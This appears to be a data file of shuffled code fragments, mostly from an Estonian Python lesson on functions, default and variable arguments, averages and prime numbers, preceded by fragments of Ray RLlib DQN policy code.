ray.rllib.agents.dqn.dqn_torch_model import", "= model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]:", "framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"],", "advantages_centered else: value = action_scores return value, logits, probs_or_logits def", "done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1:", "make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error},", "RHS of bellman equation q_t_selected_target = rewards + gamma**n_step *", "}, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) ->", "\"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch)", "forward pass on loss to update td error attribute build_q_losses(self,", "obs, \"is_training\": is_training, }, [], None) if config[\"num_atoms\"] > 1:" ]
[]
[ "2, 3)) print(numcount(1, 2, 3, \"4\")) print(numcount(1, None, 3, 4,", "argumente + 1 return sum / argumente print(keskmine(1, 2)) #", "tuleb '*' kasutada arvud=[1, 2, 3] print(summa(*arvud)) arvud=[1, 2, 3,", "4, 5] print(summa(*arvud)) arvud=[1] print(summa(*arvud)) # Erinevat sort argumendid def", "väärtus1, arg2 = väärtus2) # pass def funk(arg1 = 0,", "num return sum print(summa()) # Isegi see variant töötab print(summa(1))", "variant töötab print(summa(1)) print(summa(1, 2)) arvud=[1, 2] print(summa(*arvud)) # Ka", "\"True\", **kwargs): print(arg1, arg2, *args, kw1, kw2) for (arg, val)", "massiiv arvud=[1, 2] print(summa(arvud)) arvud=[1, 2, 3] print(summa(arvud)) arvud=[1, 2,", "# Võime jagatava teha float tüübiks print(numsum(1)) print(numsum(1, 2)) print(numsum(1,", "# Võime panna ka ilma vahemuutujata arvud=[1] print(summa(arvud)) def summa(*numbrid):", "tööta, kuna pole massiiv arvud=[1, 2] print(summa(arvud)) arvud=[1, 2, 3]", "sum += num return sum #print(summa(1)) # Ei tööta, kuna", "num2, num3 = 0, num4 = 0): sum = num1", "10, kw3 = 12, kw4 = 14) # Kuidas garanteerida,", "mis summa(num1, num2, num3, num4) argumente = 4.0 return sum", "kasutamisest # def funk(arg1 = väärtus1, arg2 = väärtus2) #", "Täiendame argumentide arvu leidmist def keskmine(num1, num2, num3 = 0,", "2.0 # Minimaalselt 2 if num3 is not None: argumente", "üle print(summa(1, 2, 3)) # Katsetame vaikeväärtustega funktsioone def summa(num1,", "panna else: print(f\"{n} EI OLE algarv\") def list_primes(max_num = 100):", "leidmist def keskmine(num1, num2, num3 = 0, num4 = 0):", "num3 if num4 is not None: argumente += 1 sum", "print(keskmine(1, 2, 3)) # Ka vale tulemus (2 asemel 1.5)", "def numavg(*numbrid): sum = numsum(*numbrid) count = numcount(*numbrid) return sum", "Muutuva arvu argumentidega funktsioonid # # Lisame lihtsalt uusi argumente", "Kustume funktsiooni testimiseks välja n = 5 if isprime(n): print(f\"{n}", "1, kw2 = \"True\", **kwargs): print(arg1, arg2, *args, kw1, kw2)", "algarv\") def list_primes(max_num = 100): for n in range(2, max_num):", "print(keskmine(1, 2, 3, 4)) # Õige tulemus # Täiendame argumentide", "teistsugust vaikeväärtust def keskmine(num1, num2, num3 = None, num4 =", "5) print(sum) # Näide vaikeväärtuste kasutamisest # def funk(arg1 =", "sum = sum + num3 if num4 is not None:", "isinstance(num, float): sum += num return sum def numcount(*numbrid): count", "0, 3, 2)) # Õige tulemus!?! Kuidas see nüüd õige", "# Minimaalselt 2 if num3 is not None: argumente +=", "kirjutab eelmise üle print(summa(1, 2, 3)) # Katsetame vaikeväärtustega funktsioone", "2 if num3 > 0: argumente = argumente + 1", "funktsioon nõuab 3 argumenti # Katsetame funktsiooni ülelaadimist (function overloading", "= 14) def argfun(arg1, arg2, *args, **kwargs): print(arg1, arg2, *args)", "vaikeväärtust def keskmine(num1, num2, num3 = None, num4 = None):", "et argumentideks on numbrid? def numsum(*numbrid): sum = 0 for", "= 4.0 return sum / argumente print(keskmine(1, 2)) # Ilmselgelt", "numbrid: sum += num return sum #print(summa(1)) # Ei tööta,", "None, 3, 4, 5)) print(numavg()) # Viga! Nulliga jagamine!!! #", "return sum #print(summa(1)) # Ei tööta, kuna pole itereeritav tüüp", "print(summa()) # Isegi see variant töötab print(summa(1)) print(summa(1, 2)) arvud=[1,", "+ num2 + num3 + num4 # Sama, mis summa(num1,", "numcount(*numbrid) return sum / (count * 1.0) # Võime jagatava", "# Lisame lihtsalt uusi argumente def summa(num1, num2, num3): return", "- kas tulemus sõltub argumentide järjekorrast? # Kasutame teistsugust vaikeväärtust", "viimane def kirjutab eelmise üle print(summa(1, 2, 3)) # Katsetame", "tulemus print(keskmine(1, 2, 3, 0)) # Vale tulemus! print(keskmine(1, 0,", "num3 is not None: argumente += 1 sum = sum", "num3 print(summa(1, 2)) # Saame vea, kuna viimane def kirjutab", "num3 + num4 # Sama, mis summa(num1, num2, num3, num4)", "2, 3)) # Õige tulemus print(keskmine(1, 2, 3, 4)) #", "return sum print(summa()) # Isegi see variant töötab print(summa(1)) print(summa(1,", "print(\"See on protseduur\") # Kutsume funktsiooni välja minu_funktsioon() # #", "is not None: argumente += 1 sum = sum +", "2.0 # Minimaalselt 2 if num3 > 0: argumente =", "f-formaatimisstringi, mis lubab muutuja otse stringi sisse panna else: print(f\"{n}", "kohe 4 arg'i kokku liita argumente = 2.0 # Minimaalselt", "# Töötab print(summa(1, 2)) # Saame vea, kuna uus funktsioon", "3)) # Katsetame vaikeväärtustega funktsioone def summa(num1, num2, num3 =", "num1 + num2 + num3 + num4 print(summa(1, 2)) print(summa(1,", "num in numbrid: sum += num return sum print(summa()) #", "print(summa(*arvud)) arvud=[1] print(summa(*arvud)) # Erinevat sort argumendid def argfun(arg1, arg2,", "testimiseks välja n = 5 if isprime(n): print(f\"{n} ON algarv\")", "funktsiooni välja minu_funktsioon() # # Funktsioon # def liida(num1, num2):", "num4) argumente = 2.0 # Minimaalselt 2 if num3 >", "print(keskmine(1, 2, 3, 0)) # Vale tulemus! print(keskmine(1, 0, 3,", "argfun(arg1, arg2, *args, kw1 = 1, kw2 = \"True\"): print(arg1,", "return num1 + num2 + num3 print(summa(1, 2, 3)) #", "= 0 for num in numbrid: if isinstance(num, int) or", "/ argumente print(keskmine(1, 2)) # Õige tulemus print(keskmine(1, 2, 3))", "3)) print(numcount(1, 2, 3, \"4\")) print(numcount(1, None, 3, 4, 5))", "OLE algarv\") def list_primes(max_num = 100): for n in range(2,", "def argfun(arg1, arg2, *args, **kwargs): print(arg1, arg2, *args) for (arg,", "3, 4, 5)) print(\"-\"*30) print(numcount(1)) print(numcount(1, 2)) print(numcount(1, 2, 3))", "for i in range(2, n): if n % i ==", "kw1 = 1, kw2 = \"True\", **kwargs): print(arg1, arg2, *args,", "2)) # Ilmselgelt vale tulemus (1.5 asemel 0.75) print(keskmine(1, 2,", "end = ' ', flush = True) print() list_primes() #", "return sum / argumente print(keskmine(1, 2)) # Ilmselgelt vale tulemus", "sum = sum + num4 return sum / argumente print(keskmine(1,", "# Erinevat sort argumendid def argfun(arg1, arg2, *args, kw1 =", "3)) print(numavg(1, 2, 3, \"4\")) print(numavg(1, None, 3, 4, 5))", "argumente print(keskmine(1, 2)) # Õige tulemus print(keskmine(1, 2, 3)) #", "sum / argumente print(keskmine(1, 2)) # Õige tulemus print(keskmine(1, 2,", "# Saame vea, kuna viimane def kirjutab eelmise üle print(summa(1,", "num1 + num2 + num3 print(summa(1, 2, 3)) # Töötab", "in range(2, max_num): if isprime(n): print(n, end = ' ',", "kuna pole massiiv arvud=[1, 2] print(summa(arvud)) arvud=[1, 2, 3] print(summa(arvud))", "num4 = 0): return num1 + num2 + num3 +", "') print() argfun(kw2 = 10, kw3 = 12, kw4 =", "summa(num1, num2, num3): return num1 + num2 + num3 print(summa(1,", "Kuidas see nüüd õige on - kas tulemus sõltub argumentide", "def minu_funktsioon(): print(\"See on protseduur\") # Kutsume funktsiooni välja minu_funktsioon()", "funktsioone def summa(num1, num2, num3 = 0, num4 = 0):", "= 0): sum = num1 + num2 + num3 +", "# Minimaalselt 2 if num3 > 0: argumente = argumente", "# Õige tulemus print(keskmine(1, 2, 3, 0)) # Vale tulemus!", "summa(num1, num2, num3, num4) argumente = 4.0 return sum /", "# Ka vale tulemus (2 asemel 1.5) print(keskmine(1, 2, 3,", "= num1 + num2 # Ei saa kohe 4 arg'i", "# Viga! Nulliga jagamine!!! # Vigade haldamist vaatame peatselt ka", "14) def argfun(arg1, arg2, *args, kw1 = 1, kw2 =", "# Kustume funktsiooni testimiseks välja n = 5 if isprime(n):", "numcount(*numbrid): count = 0 for num in numbrid: if isinstance(num,", "for n in range(2, max_num): if isprime(n): print(n, end =", "print(summa(arvud)) def summa(*numbrid): sum = 0 for num in numbrid:", "5, kw1 = 10, kw2 = 12) def argfun(**kwargs): for", "arvu argumentidega funktsioonid # # Lisame lihtsalt uusi argumente def", "print(arg1, arg2, *args, kw1, kw2) argfun(1, 2, 3, 4, 5,", "num1 + num2 + num3 + num4 # Sama, mis", "+ num3 print(summa(1, 2)) # Saame vea, kuna viimane def", "numsum(*numbrid) count = numcount(*numbrid) return sum / (count * 1.0)", "# Selle tööle saamiseks peame f-ni muutma def keskmine(num1, num2,", "arg2, *args, **kwargs): print(arg1, arg2, *args) for (arg, val) in", "*args, kw1 = 1, kw2 = \"True\"): print(arg1, arg2, *args,", "max_num): if isprime(n): print(n, end = ' ', flush =", "argumente def summa(num1, num2, num3): return num1 + num2 +", "n in range(2, max_num): if isprime(n): print(n, end = '", "+= num return sum print(summa()) # Isegi see variant töötab", "= 12, kw4 = 14) def argfun(arg1, arg2, *args, kw1", "return True # Kustume funktsiooni testimiseks välja n = 5", "for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end = ' ')", "print() argfun(1, 2, 3, 4, 5, kw2 = 10, kw3", "= \"True\"): print(arg1, arg2, *args, kw1, kw2) argfun(1, 2, 3,", "**kwargs): print(arg1, arg2, *args) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\",", "liita argumente = 2.0 # Minimaalselt 2 if num3 is", "# Kasutame teistsugust vaikeväärtust def keskmine(num1, num2, num3 = None,", "# Täiendame argumentide arvu leidmist def keskmine(num1, num2, num3 =", "jagatava teha float tüübiks print(numsum(1)) print(numsum(1, 2)) print(numsum(1, 2, 3))", "num2 + num3 + num4 print(summa(1, 2)) print(summa(1, 2, 3))", "tulemus! print(keskmine(1, 0, 3, 2)) # Õige tulemus!?! Kuidas see", "10, kw3 = 12, kw4 = 14) def argfun(arg1, arg2,", "= 14) # Kuidas garanteerida, et argumentideks on numbrid? def", "liida(num1, num2): return num1 + num2 sum = liida(3, 5)", "if isinstance(num, int) or isinstance(num, float): count += 1 return", "arvud=[1, 2, 3] print(summa(arvud)) arvud=[1, 2, 3, 4] print(summa(arvud)) print(summa([1,", "# def liida(num1, num2): return num1 + num2 sum =", "4)) #print(summa(1, 2, 3, 4, 5)) # Selle tööle saamiseks", "protseduuride kasutamine \"\"\" # # Protseduur # def minu_funktsioon(): print(\"See", "print(summa(*arvud)) # Ka siin tuleb '*' kasutada arvud=[1, 2, 3]", "sum + num4 return sum / argumente print(keskmine(1, 2)) #", "vale tulemus (1.5 asemel 0.75) print(keskmine(1, 2, 3)) # Ka", "peame f-ni muutma def keskmine(num1, num2, num3 = 0, num4", "summa(*numbrid): sum = 0 for num in numbrid: sum +=", "2)) # Õige tulemus # Proovime listiga argumente defineerida def", "Algarvude leidmine # def isprime(n): if n <= 1: return", "argumente = 4.0 return sum / argumente print(keskmine(1, 2)) #", "= \"True\", **kwargs): print(arg1, arg2, *args, kw1, kw2) for (arg,", "5] print(summa(*arvud)) arvud=[1] print(summa(*arvud)) # Erinevat sort argumendid def argfun(arg1,", "num4 return sum / argumente print(keskmine(1, 2)) # Õige tulemus", "int) or isinstance(num, float): sum += num return sum def", "andmata # # Algarvude leidmine # def isprime(n): if n", "Protseduur # def minu_funktsioon(): print(\"See on protseduur\") # Kutsume funktsiooni", "# def isprime(n): if n <= 1: return False for", "argumente += 1 sum = sum + num4 return sum", "print(numavg(1, 2, 3)) print(numavg(1, 2, 3, \"4\")) print(numavg(1, None, 3,", "0): sum = num1 + num2 + num3 + num4", "kw1 = 10, kw2 = 12) def argfun(**kwargs): for (arg,", "num return sum #print(summa(1)) # Ei tööta, kuna pole itereeritav", "2, 3, 4, 5, kw1 = 10, kw2 = 12)", "' ') print() argfun(kw2 = 10, kw3 = 12, kw4", "# # Funktsioon # def liida(num1, num2): return num1 +", "pole itereeritav tüüp #print(summa(1, 2)) # Ei tööta, kuna pole", "print(numsum(1)) print(numsum(1, 2)) print(numsum(1, 2, 3)) print(numsum(1, 2, 3, \"4\"))", "isprime(n): print(n, end = ' ', flush = True) print()", "/ argumente print(keskmine(1, 2)) # Ilmselgelt vale tulemus (1.5 asemel", "= argumente + 1 if num4 > 0: argumente =", "stringi sisse panna else: print(f\"{n} EI OLE algarv\") def list_primes(max_num", "count = 0 for num in numbrid: if isinstance(num, int)", "2, 3, \"4\")) print(numcount(1, None, 3, 4, 5)) print(\"-\"*30) print(numavg(1))", "argumente kaasa andmata # # Algarvude leidmine # def isprime(n):", "panna ka ilma vahemuutujata arvud=[1] print(summa(arvud)) def summa(*numbrid): sum =", "10, kw2 = 12) def argfun(**kwargs): for (arg, val) in", "def summa(num1, num2, num3 = 0, num4 = 0): return", "3, 4)) # Õige tulemus print(keskmine(1, 2, 3, 0)) #", "argumente += 1 sum = sum + num3 if num4", "print(summa(1, 2, 3, 4)) #print(summa(1, 2, 3, 4, 5)) #", "kw1 = 1, kw2 = \"True\"): print(arg1, arg2, *args, kw1,", "2)) print(numavg(1, 2, 3)) print(numavg(1, 2, 3, \"4\")) print(numavg(1, None,", "# def minu_funktsioon(): print(\"See on protseduur\") # Kutsume funktsiooni välja", "print(arg1, arg2) funk() # Kutsume funktsiooni välja ilma argumente kaasa", "Saame vea, kuna viimane def kirjutab eelmise üle print(summa(1, 2,", "2, 3, 4] print(summa(*arvud)) arvud=[1, 2, 3, 4, 5] print(summa(*arvud))", "# Vale tulemus! print(keskmine(1, 0, 3, 2)) # Õige tulemus!?!", "tüübiks print(numsum(1)) print(numsum(1, 2)) print(numsum(1, 2, 3)) print(numsum(1, 2, 3,", "2)) # Õige tulemus!?! Kuidas see nüüd õige on -", "= 1, kw2 = \"True\", **kwargs): print(arg1, arg2, *args, kw1,", "return num1 + num2 sum = liida(3, 5) print(sum) #", "2, 3, 4, 5])) # Võime panna ka ilma vahemuutujata", "tööle saamiseks peame f-ni muutma def keskmine(num1, num2, num3 =", "kwargs.items(): print(f\"{arg}={val}\", end = ' ') print() argfun(1, 2, 3,", "teha float tüübiks print(numsum(1)) print(numsum(1, 2)) print(numsum(1, 2, 3)) print(numsum(1,", "vea, kuna viimane def kirjutab eelmise üle print(summa(1, 2, 3))", "uus funktsioon nõuab 3 argumenti # Katsetame funktsiooni ülelaadimist (function", "if n % i == 0: return False else: return", "Õige tulemus print(keskmine(1, 2, 3, 4)) # Õige tulemus print(keskmine(1,", "num2 sum = liida(3, 5) print(sum) # Näide vaikeväärtuste kasutamisest", "2, 3, 0)) # Vale tulemus! print(keskmine(1, 0, 3, 2))", "num4 is not None: argumente += 1 sum = sum", "num2, num3, num4) argumente = 2.0 # Minimaalselt 2 if", "' ') print() argfun(1, 2, 3, 4, 5, kw2 =", "väärtus2) # pass def funk(arg1 = 0, arg2 = \"Test\"):", "print(arg1, arg2, *args) for (arg, val) in kwargs.items(): print(f\"{arg}={val}\", end", "num in numbrid: if isinstance(num, int) or isinstance(num, float): count", "' ', flush = True) print() list_primes() # # Muutuva", "1 sum = sum + num4 return sum / argumente", "kw2 = \"True\", **kwargs): print(arg1, arg2, *args, kw1, kw2) for", "in numbrid: sum += num return sum print(summa()) # Isegi", "val) in kwargs.items(): print(f\"{arg}={val}\", end = ' ') print() argfun(kw2", "+ num4 print(summa(1, 2)) print(summa(1, 2, 3)) print(summa(1, 2, 3,", "arvud=[1, 2, 3] print(summa(*arvud)) arvud=[1, 2, 3, 4] print(summa(*arvud)) arvud=[1,", "return num1 + num2 def summa(num1, num2, num3): return num1", "\"4\")) print(numcount(1, None, 3, 4, 5)) print(\"-\"*30) print(numavg(1)) print(numavg(1, 2))", "minu_funktsioon() # # Funktsioon # def liida(num1, num2): return num1", "def liida(num1, num2): return num1 + num2 sum = liida(3,", "\"True\"): print(arg1, arg2, *args, kw1, kw2) argfun(1, 2, 3, 4,", "= 1, kw2 = \"True\"): print(arg1, arg2, *args, kw1, kw2)", "see nüüd õige on - kas tulemus sõltub argumentide järjekorrast?", "1: return False for i in range(2, n): if n", "= 0): return num1 + num2 + num3 + num4", "# Kuidas garanteerida, et argumentideks on numbrid? def numsum(*numbrid): sum", "sum / argumente print(keskmine(1, 2)) # Ilmselgelt vale tulemus (1.5", "count += 1 return count def numavg(*numbrid): sum = numsum(*numbrid)", "# Ei tööta, kuna pole itereeritav tüüp #print(summa(1, 2)) #", "nõuab 3 argumenti # Katsetame funktsiooni ülelaadimist (function overloading või", "2, 3, 4)) # Õige tulemus # Täiendame argumentide arvu", "ja protseduuride kasutamine \"\"\" # # Protseduur # def minu_funktsioon():", "argumente print(keskmine(1, 2)) # Ilmselgelt vale tulemus (1.5 asemel 0.75)", "in kwargs.items(): print(f\"{arg}={val}\", end = ' ') print() argfun(kw2 =", "kw2 = 10, kw3 = 12, kw4 = 14) def", "def isprime(n): if n <= 1: return False for i", "n): if n % i == 0: return False else:", "= sum + num4 return sum / argumente print(keskmine(1, 2))", "print(summa(1, 2, 3)) # Töötab print(summa(1, 2)) # Saame vea,", "3, 4, 5] print(summa(*arvud)) arvud=[1] print(summa(*arvud)) # Erinevat sort argumendid", "2)) # Saame vea, kuna viimane def kirjutab eelmise üle", "None, num4 = None): sum = num1 + num2 #", "# # Protseduur # def minu_funktsioon(): print(\"See on protseduur\") #", "= \"Test\"): print(arg1, arg2) funk() # Kutsume funktsiooni välja ilma", "3)) print(numsum(1, 2, 3, \"4\")) print(numsum(1, None, 3, 4, 5))", "flush = True) print() list_primes() # # Muutuva arvu argumentidega", "% i == 0: return False else: return True #", "Ei tööta, kuna pole massiiv arvud=[1, 2] print(summa(arvud)) arvud=[1, 2,", "num3 print(summa(1, 2, 3)) # Töötab print(summa(1, 2)) # Saame", "def funk(arg1 = väärtus1, arg2 = väärtus2) # pass def", "2, 3)) print(summa(1, 2, 3, 4)) #print(summa(1, 2, 3, 4,", "5])) # Võime panna ka ilma vahemuutujata arvud=[1] print(summa(arvud)) def", "4, 5)) print(\"-\"*30) print(numavg(1)) print(numavg(1, 2)) print(numavg(1, 2, 3)) print(numavg(1,", "kw2 = 12) def argfun(**kwargs): for (arg, val) in kwargs.items():", "sum = liida(3, 5) print(sum) # Näide vaikeväärtuste kasutamisest #", "return sum def numcount(*numbrid): count = 0 for num in", "2)) print(numcount(1, 2, 3)) print(numcount(1, 2, 3, \"4\")) print(numcount(1, None,", "Kasutame f-formaatimisstringi, mis lubab muutuja otse stringi sisse panna else:", "Ei tööta, kuna pole itereeritav tüüp #print(summa(1, 2)) # Ei", "print(numavg(1, 2, 3, \"4\")) print(numavg(1, None, 3, 4, 5)) print(numavg())", "None: argumente += 1 sum = sum + num4 return", "False else: return True # Kustume funktsiooni testimiseks välja n", "= None): sum = num1 + num2 # Ei saa", "if n <= 1: return False for i in range(2,", "num3, num4) argumente = 4.0 return sum / argumente print(keskmine(1,", "tulemus sõltub argumentide järjekorrast? # Kasutame teistsugust vaikeväärtust def keskmine(num1,", "2, 3] print(summa(*arvud)) arvud=[1, 2, 3, 4] print(summa(*arvud)) arvud=[1, 2,", "Õige tulemus # Proovime listiga argumente defineerida def summa(numbrid=[]): sum", "arg2) funk() # Kutsume funktsiooni välja ilma argumente kaasa andmata", "num4 > 0: argumente = argumente + 1 return sum", "= 0, num4 = 0): return num1 + num2 +", "in range(2, n): if n % i == 0: return", "overloading) def summa(num1, num2): return num1 + num2 def summa(num1,", "Õige tulemus # Täiendame argumentide arvu leidmist def keskmine(num1, num2,", "2, 3)) # Ka vale tulemus (2 asemel 1.5) print(keskmine(1,", "print(summa(arvud)) arvud=[1, 2, 3] print(summa(arvud)) arvud=[1, 2, 3, 4] print(summa(arvud))", "num3): return num1 + num2 + num3 print(summa(1, 2)) #", "kasutada arvud=[1, 2, 3] print(summa(*arvud)) arvud=[1, 2, 3, 4] print(summa(*arvud))", "for num in numbrid: if isinstance(num, int) or isinstance(num, float):", "2)) print(summa(1, 2, 3)) print(summa(1, 2, 3, 4)) #print(summa(1, 2,", "', flush = True) print() list_primes() # # Muutuva arvu", "funktsioonid.py Funktsioonide ja protseduuride kasutamine \"\"\" # # Protseduur #", "in numbrid: sum += num return sum #print(summa(1)) # Ei", "asemel 1.5) print(keskmine(1, 2, 3, 4)) # Õige tulemus #", "argumente defineerida def summa(numbrid=[]): sum = 0 for num in", "on numbrid? def numsum(*numbrid): sum = 0 for num in", "# Sama, mis summa(num1, num2, num3, num4) argumente = 4.0", "print(numcount(1, 2, 3)) print(numcount(1, 2, 3, \"4\")) print(numcount(1, None, 3,", "+= 1 return count def numavg(*numbrid): sum = numsum(*numbrid) count", "1 return sum / argumente print(keskmine(1, 2)) # Õige tulemus", "+ num3 + num4 # Sama, mis summa(num1, num2, num3,", "num in numbrid: sum += num return sum #print(summa(1)) #", "if isinstance(num, int) or isinstance(num, float): sum += num return", "muutuja otse stringi sisse panna else: print(f\"{n} EI OLE algarv\")", "Viga! Nulliga jagamine!!! # Vigade haldamist vaatame peatselt ka lähemalt", "Õige tulemus print(keskmine(1, 2, 3, 0)) # Vale tulemus! print(keskmine(1,", "0 for num in numbrid: sum += num return sum", "3, 4)) # Õige tulemus # Täiendame argumentide arvu leidmist", "# Kutsume funktsiooni välja ilma argumente kaasa andmata # #", "def argfun(arg1, arg2, *args, kw1 = 1, kw2 = \"True\",", "ilma argumente kaasa andmata # # Algarvude leidmine # def", "# def funk(arg1 = väärtus1, arg2 = väärtus2) # pass", "arg'i kokku liita argumente = 2.0 # Minimaalselt 2 if", "= 2.0 # Minimaalselt 2 if num3 is not None:", "float): sum += num return sum def numcount(*numbrid): count =", "num2): return num1 + num2 sum = liida(3, 5) print(sum)", "2, 3)) print(numavg(1, 2, 3, \"4\")) print(numavg(1, None, 3, 4,", "') print() argfun(1, 2, 3, 4, 5, kw2 = 10,", "*args, **kwargs): print(arg1, arg2, *args) for (arg, val) in kwargs.items():", "def summa(num1, num2): return num1 + num2 def summa(num1, num2,", "0, arg2 = \"Test\"): print(arg1, arg2) funk() # Kutsume funktsiooni", "print(summa(arvud)) print(summa([1, 2, 3, 4, 5])) # Võime panna ka", "1.0) # Võime jagatava teha float tüübiks print(numsum(1)) print(numsum(1, 2))", "num3 = None, num4 = None): sum = num1 +", "return num1 + num2 + num3 print(summa(1, 2)) # Saame", "# pass def funk(arg1 = 0, arg2 = \"Test\"): print(arg1,", "tulemus! print(keskmine(1, 0, 3, 2)) # Õige tulemus # Proovime", "numsum(*numbrid): sum = 0 for num in numbrid: if isinstance(num,", "kokku liita argumente = 2.0 # Minimaalselt 2 if num3", "2)) # Saame vea, kuna uus funktsioon nõuab 3 argumenti", "print(keskmine(1, 2, 3, 4)) # Õige tulemus print(keskmine(1, 2, 3,", "# Muutuva arvu argumentidega funktsioonid # # Lisame lihtsalt uusi", "Minimaalselt 2 if num3 is not None: argumente += 1", "0: argumente = argumente + 1 if num4 > 0:", "+= 1 sum = sum + num3 if num4 is", "= 10, kw3 = 12, kw4 = 14) # Kuidas", "+ num2 sum = liida(3, 5) print(sum) # Näide vaikeväärtuste", "1 if num4 > 0: argumente = argumente + 1", "if num4 > 0: argumente = argumente + 1 return", "tööta, kuna pole itereeritav tüüp #print(summa(1, 2)) # Ei tööta,", "argfun(kw2 = 10, kw3 = 12, kw4 = 14) def", "= ' ') print() argfun(kw2 = 10, kw3 = 12,", "print(keskmine(1, 2, 3, 0)) # Õige tulemus! print(keskmine(1, 0, 3,", "# # Algarvude leidmine # def isprime(n): if n <=", "kw1, kw2) argfun(1, 2, 3, 4, 5, kw1 = 10,", "<reponame>priidupaomets/python_kursus<gh_stars>1-10 \"\"\" funktsioonid.py Funktsioonide ja protseduuride kasutamine \"\"\" # #", "liida(3, 5) print(sum) # Näide vaikeväärtuste kasutamisest # def funk(arg1", "protseduur\") # Kutsume funktsiooni välja minu_funktsioon() # # Funktsioon #", "itereeritav tüüp #print(summa(1, 2)) # Ei tööta, kuna pole massiiv", "Erinevat sort argumendid def argfun(arg1, arg2, *args, kw1 = 1,", "sisse panna else: print(f\"{n} EI OLE algarv\") def list_primes(max_num =", "print(f\"{arg}={val}\", end = ' ') print() argfun(kw2 = 10, kw3", "print(\"-\"*30) print(numavg(1)) print(numavg(1, 2)) print(numavg(1, 2, 3)) print(numavg(1, 2, 3,", "2 if num3 is not None: argumente += 1 sum", "Õige tulemus print(keskmine(1, 2, 3, 0)) # Õige tulemus! print(keskmine(1,", "Katsetame vaikeväärtustega funktsioone def summa(num1, num2, num3 = 0, num4", "print(keskmine(1, 0, 3, 2)) # Õige tulemus # Proovime listiga", "not None: argumente += 1 sum = sum + num3", "= 14) def argfun(arg1, arg2, *args, kw1 = 1, kw2", "/ (count * 1.0) # Võime jagatava teha float tüübiks", "return count def numavg(*numbrid): sum = numsum(*numbrid) count = numcount(*numbrid)", "= None, num4 = None): sum = num1 + num2", "num2 + num3 + num4 # Sama, mis summa(num1, num2,", "kuna pole itereeritav tüüp #print(summa(1, 2)) # Ei tööta, kuna", "# Ka siin tuleb '*' kasutada arvud=[1, 2, 3] print(summa(*arvud))", "# Kasutame f-formaatimisstringi, mis lubab muutuja otse stringi sisse panna", "print(f\"{n} ON algarv\") # Kasutame f-formaatimisstringi, mis lubab muutuja otse", "summa(num1, num2): return num1 + num2 def summa(num1, num2, num3):", "def funk(arg1 = 0, arg2 = \"Test\"): print(arg1, arg2) funk()", "+= num return sum #print(summa(1)) # Ei tööta, kuna pole", "Ilmselgelt vale tulemus (1.5 asemel 0.75) print(keskmine(1, 2, 3)) #", "# Protseduur # def minu_funktsioon(): print(\"See on protseduur\") # Kutsume", "3] print(summa(*arvud)) arvud=[1, 2, 3, 4] print(summa(*arvud)) arvud=[1, 2, 3,", "num in numbrid: if isinstance(num, int) or isinstance(num, float): sum", "4)) # Õige tulemus print(keskmine(1, 2, 3, 0)) # Vale", "= väärtus1, arg2 = väärtus2) # pass def funk(arg1 =", "# # Lisame lihtsalt uusi argumente def summa(num1, num2, num3):", "print(summa(1, 2, 3)) print(summa(1, 2, 3, 4)) #print(summa(1, 2, 3,", "#print(summa(1)) # Ei tööta, kuna pole itereeritav tüüp #print(summa(1, 2))", "2)) arvud=[1, 2] print(summa(*arvud)) # Ka siin tuleb '*' kasutada", "argfun(arg1, arg2, *args, **kwargs): print(arg1, arg2, *args) for (arg, val)", "num return sum def numcount(*numbrid): count = 0 for num", "3, \"4\")) print(numavg(1, None, 3, 4, 5)) print(numavg()) # Viga!", "numbrid: if isinstance(num, int) or isinstance(num, float): sum += num", "Sama, mis summa(num1, num2, num3, num4) argumente = 2.0 #", "if num3 is not None: argumente += 1 sum =", "num3 = 0, num4 = 0): sum = num1 +", "2)) # Ei tööta, kuna pole massiiv arvud=[1, 2] print(summa(arvud))", "print(keskmine(1, 0, 3, 2)) # Õige tulemus!?! Kuidas see nüüd", "sum + num3 if num4 is not None: argumente +=", "num2 def summa(num1, num2, num3): return num1 + num2 +", "kw2 = \"True\"): print(arg1, arg2, *args, kw1, kw2) argfun(1, 2,", "argumente = 2.0 # Minimaalselt 2 if num3 is not", "= ' ', flush = True) print() list_primes() # #", "välja n = 5 if isprime(n): print(f\"{n} ON algarv\") #", "num2, num3): return num1 + num2 + num3 print(summa(1, 2,", "sum += num return sum print(summa()) # Isegi see variant", "return sum / (count * 1.0) # Võime jagatava teha", "funk(arg1 = väärtus1, arg2 = väärtus2) # pass def funk(arg1", "4, 5)) # Selle tööle saamiseks peame f-ni muutma def", "2, 3, 4)) # Õige tulemus print(keskmine(1, 2, 3, 0))", "on - kas tulemus sõltub argumentide järjekorrast? # Kasutame teistsugust", "num2 + num3 print(summa(1, 2)) # Saame vea, kuna viimane", "+ num3 if num4 is not None: argumente += 1", "# Funktsioon # def liida(num1, num2): return num1 + num2", "Õige tulemus! print(keskmine(1, 0, 3, 2)) # Õige tulemus #", "tüüp #print(summa(1, 2)) # Ei tööta, kuna pole massiiv arvud=[1,", "# Õige tulemus # Proovime listiga argumente defineerida def summa(numbrid=[]):", "4, 5)) print(numavg()) # Viga! Nulliga jagamine!!! # Vigade haldamist", "arvud=[1, 2] print(summa(arvud)) arvud=[1, 2, 3] print(summa(arvud)) arvud=[1, 2, 3,", "+ num4 # Sama, mis summa(num1, num2, num3, num4) argumente", "print(numsum(1, 2, 3)) print(numsum(1, 2, 3, \"4\")) print(numsum(1, None, 3,", "3, 4, 5)) # Selle tööle saamiseks peame f-ni muutma", "5)) print(numavg()) # Viga! Nulliga jagamine!!! # Vigade haldamist vaatame", "2, 3)) # Töötab 